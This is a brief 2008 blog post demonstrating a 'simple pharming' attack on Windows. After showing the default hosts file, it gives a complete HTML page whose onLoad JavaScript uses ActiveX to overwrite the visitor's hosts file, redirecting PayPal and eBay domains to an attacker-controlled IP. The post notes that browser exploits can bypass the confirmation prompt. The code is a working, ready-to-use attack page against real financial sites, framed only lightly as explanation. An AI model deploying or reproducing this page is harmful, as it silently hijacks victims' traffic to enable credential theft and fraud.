Simple Pharming

May 5, 2008 – 5:17 AM

Today I decided to give a very brief example on pharming and why it’s so easy to pharm surfers with little or no skills. Usually, browser exploit writers give simple examples on how to read the boot files, or launch a calculator. There is so much you can do with Javascript that the best way to describe the toxic mix of browser exploits with Javascript will be an example to launch a pharming attack. The sheer beauty of pharming is that the surfer will almost never know that he has been compromised, because it is very silent. One way of quickly pharm surfers is to modify the hosts file on Windows.

The hosts file on XP is located at:

C:/WINDOWS/system32/Drivers/etc/hosts

And consist of something like this:

# Copyright (c) 1993-1999 Microsoft Corp.

#

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

#

# This file contains the mappings of IP addresses to host names. Each

# entry should be kept on an individual line. The IP address should

# be placed in the first column followed by the corresponding host name.

# The IP address and the host name should be separated by at least one

# space.

#

# Additionally, comments (such as these) may be inserted on individual

# lines or following the machine name denoted by a '#' symbol.

#

# For example:

#

#      102.54.94.97     rhino.acme.com          # source server

#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost

As you can see, the last line contains our 127.0.0.1 address on which the lookup will be made when we type “localhost” into our browser. This is how these lookups are done these days. If the browser cannot locate it, it will try different combinations, like appending www and .com to the request. The most important thing to know is, that if this file is modified it stays modified and it is very unobtrusive to it’s user because it only requires a one time write access. Sadly, Microsoft doesn’t seem to learn about the Active-X risks. As said before, I see no valid reason why Javascript should have write access to the file system.

The script below requires user confirmation in the browser, but like I said some browser exploits will take care of this. It means that you can be pharmed without you knowing it happened. That is the most scary part about it, and why browser exploits are so dangerous.In the script below we just route any traffic to our evil IP with only a small piece of Javascript that overwrites the surfers hosts file.

<html>

<head>

<script language="javascript">

function pharmer(){

var fso = new ActiveXObject("Scripting.FileSystemObject");

var pharm = fso.CreateTextFile("C:\\WINDOWS\\system32\\Drivers\\etc\\hosts", true);

pharm.WriteLine('127.0.0.1       localhost');

pharm.WriteLine('188.222.33.1    paypal');

pharm.WriteLine('188.222.33.1    www.paypal.com');

pharm.WriteLine('188.222.33.1    ebay.com');

pharm.WriteLine('188.222.33.1    www.ebay.com');

pharm.Close();

}

</script>

</head>

<body onLoad="pharmer()">

</body>

</html>

Et Voila, that’s all there really is for a very basic pharming attack, obviously there are more ways but this gives a good example on what pharming exactly is and does, and how easy it actually can be.

Source: 0x000000